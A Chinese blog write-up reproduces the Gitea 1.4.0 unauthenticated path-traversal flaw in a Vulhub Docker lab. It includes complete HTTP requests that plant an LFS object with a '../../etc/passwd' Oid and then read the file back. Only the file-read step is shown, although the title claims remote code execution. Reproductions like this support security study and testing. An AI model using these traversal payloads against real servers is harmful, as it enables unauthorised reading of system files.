​Gitea 1.4 未授权远程代码执行

一、漏洞描述

Gitea是从gogs衍生出的一个开源项目,是一个类似于Github、Gitlab的多用户Git仓库管理平台。其1.4.0版本中有一处逻辑错误,导致未授权用户可以穿越目录,读写任意文件,最终导致执行任意命令。

二、影响版本

1.4.0

三、环境准备&&漏洞复现

Vulhub进行搭建

https://github.com/vulhub/vulhub/tree/master/gitea/1.4-rce安装镜像docker-compose up -d

环境启动成功

初始化配置:

http://192.168.1.108:3000/install

其他默认设置一下管理员账户密码:

初始化完成成功进去面板

安装完成后,新建一个用户,然后创建一个公开的仓库

创建一个公开的仓库

仓库创见成功

需要重启一下重启gitea服务

docker-compose restart

漏洞验证:

具体数据包:

POST/lostworld/getpasswd.git/info/lfs/objectsHTTP/1.1Host: 192.168.1.108:3000Cache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.67 Safari/537.36 Edg/87.0.664.52Accept: application/vnd.git-lfs+jsonAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6Cookie: lang=zh-CN; i_like_gitea=7b3a3994aeff5ed0; _csrf=lA-gqD5gapHJeeQEz_XUOsejTSY6MTYwOTk4NzQ3MTAwNDc0MzE3OQ%3D%3DConnection: closeContent-Length: 153​{"Oid":"....../../../etc/passwd","Size":1000000,"User":"a","Password":"a","Repo":"a","Authorization":"a"}

出现401说明发送数据包LFS对象已经创建成功,且其Oid为....../../../etc/passwd。

访问路径

http://192.168.1.108:3000/admins/test.git/info/lfs/objects/......%2F..%2F..%2Fetc%2Fpasswd/sth

具体读取数据包

GET/lostworld/getpasswd.git/info/lfs/objects/......%2F..%2F..%2Fetc%2Fpasswd/sthHTTP/1.1Host: 192.168.1.108:3000Cache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.67 Safari/537.36 Edg/87.0.664.52Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6Cookie: lang=zh-CN; i_like_gitea=19fae7187e6a86e2; _csrf=y0uGd4qsOuq8esEW9S4hXHWRGHo6MTYwOTk4ODAwNzczODc4NzI3MQ%3D%3DConnection: close

参考:

https://github.com/vulhub/vulhub/tree/master/gitea/1.4-rce

https://mp.weixin.qq.com/s/vsQsATBNbOkyVmTgm-zU2w

免责声明:本站提供安全工具、程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!

转载声明:著作权归作者所有。商业转载请联系作者获得授权,非商业转载请注明出处。

订阅查看更多复现文章、学习笔记

thelostworld

安全路上,与你并肩前行!!!!

个人知乎:https://www.zhihu.com/people/fu-wei-43-69/columns

个人简书:https://www.jianshu.com/u/bf0e38a8d400

个人CSDN:https://blog.csdn.net/qq_37602797/category_10169006.html

个人博客园:https://www.cnblogs.com/thelostworld/

FREEBUF主页:https://www.freebuf.com/author/thelostworld?type=article

欢迎添加本公众号作者微信交流,添加时备注一下“公众号”

2021近期往期内容:

MinIO未授权SSRF漏洞(CVE-2021-21287)

Apache Druid 命令执行漏洞(CVE-2021-25646)复现

Linux sudo权限提升漏洞(CVE-2021-3156)复现

CVE-2021-3129-Laravel Debug mode 远程代码执行漏洞

SonicWall SSL-VPN 远程命令执行漏洞

CVE-2021-2109 Weblogic Server远程代码执行

Apache Flink (文件写入漏洞/文件读取漏洞)CVE-2020-17518/17519

Gitea 1.4 未授权远程代码执行漏洞复现相关推荐

  1. CVE-2021-30461 - VoIPMonitor未授权远程代码执行漏洞

    VoIPMonitor未授权远程代码执行漏洞 0X001前言 0X002 漏洞影响 0X003 漏洞原理 0X004 漏洞复现 0X041 空间搜索寻找目标 0X042 测试代码执行 0X005 PO ...

  2. Nette框架未授权任意代码执行漏洞分析

    Nette框架未授权任意代码执行漏洞分析 漏洞介绍: Nette Framework 是个强大,基于组件的事件驱动 PHP 框架,用来创建 web 应用.Nette Framework 是个现代化风格 ...

  3. 用友NC BeanShell远程代码执行漏洞复现

    用友NC远程代码执行漏洞复现 漏洞介绍 用友NC是面向集团企业的管理软件,其在同类市场占有率中达到亚太第一.该漏洞是由于用友NC对外开放了BeanShell接口,攻击者可以在未授权的情况下直接访问该接 ...

  4. [系统安全] 九.Windows漏洞利用之MS08-067远程代码执行漏洞复现及深度防御

    您可能之前看到过我写的类似文章,为什么还要重复撰写呢?只是想更好地帮助初学者了解病毒逆向分析和系统安全,更加成体系且不破坏之前的系列.因此,我重新开设了这个专栏,准备系统整理和深入学习系统安全.逆向分 ...

  5. Windows漏洞:MS08-067远程代码执行漏洞复现及深度防御

    摘要:详细讲解MS08-067远程代码执行漏洞(CVE-2008-4250)及防御过程 本文分享自华为云社区<Windows漏洞利用之MS08-067远程代码执行漏洞复现及深度防御>,作者 ...

  6. Office 远程代码执行漏洞复现过程

    本文来自作者肖志华在 GitChat 上分享 「Office 远程代码执行漏洞复现过程」,「阅读原文」查看交流实录. 编辑 | 天津饭 直接贴本地复现过程,至于怎么利用还请自己思考. 2017年11月 ...

  7. ThinkPHP 5.0.23 远程代码执行 漏洞复现

    ThinkPHP 5.0.23 远程代码执行 漏洞复现 一.漏洞描述 二.漏洞影响 三.漏洞复现 1. 环境搭建 2. 漏洞复现 四.漏洞POC 五.参考链接 六.利用工具 一.漏洞描述 ThinkP ...

  8. IIS_CVE-2017-7269 IIS6.0远程代码执行漏洞复现

    CVE-2017-7269 IIS6.0远程代码执行漏洞复现 一.漏洞描述 IIS 6.0默认不开启WebDAV,一旦开启了WebDAV,安装了IIS6.0的服务器将可能受到该漏洞的威胁. 二.影响版 ...

  9. WebLogic Server 远程代码执行漏洞复现 (CVE-2023-21839)

    1.产品简介 Oracle WebLogic Server是一个统一的可扩展平台,用于在本地和云端开发.部署和运行企业应用程序,例如 Java.WebLogic Server提供了Java Enter ...

最新文章

  1. MySQL优化篇:SQL优化流程
  2. 技术架构委员需要关注哪些问题
  3. android对话框的使用(下)
  4. mysql 连续签到天数_天天拿帮会通宝 帮会签到真给力
  5. Xcode 6 Bug:Interface Builder文件中的未知类
  6. Phalcon控制器
  7. boost::hana::keys用法的测试程序
  8. Firebug控制台详解
  9. 最新西安计算机信息会议,第23届全国信息存储技术学术会议在西安召开
  10. Mysql中导入和导出数据库
  11. Java学习之==注释、数据类型、变量、运算符
  12. GPRS网络总体结构
  13. 浅析刚参加工作的大学生的心理态势
  14. 姜启源《数学建模》学习笔记 第一周
  15. hopfield tsp matlab,TSP问题—Hopfield神经网络算法
  16. C语言文件操作(文件读写)
  17. 微信照片打印服务器端,基于微信平台的自助照片打印系统
  18. 项目积压需求项目计划_物料需求-计划的方案.ppt
  19. 注册表修复工具+强制卸载工具
  20. 自动清理垃圾文件与文件夹脚本.bat

热门文章

  1. HDU 3085 Nightmare Ⅱ【BFS +曼哈顿距离+综合性较强】
  2. 洛谷P5238 整数校验器【三月月赛】
  3. 快剪辑剪辑视频1920*1080
  4. 谢宁方法或谢宁DOE
  5. 在java中用log4j写日志文件
  6. raw/rgb/yuv/nv21图像格式总结
  7. 号外:八百呼的录音话机现场“教学”管理企业
  8. 论文阅读-Boosting Data-driven Evolutionary Algorithm with Localized Data Generation
  9. P2905 [USACO08OPEN]农场危机Crisis on the Farm(简单dp+麻烦“回溯”)
  10. HttpClient 调用耗时长服务问题记录和处理方案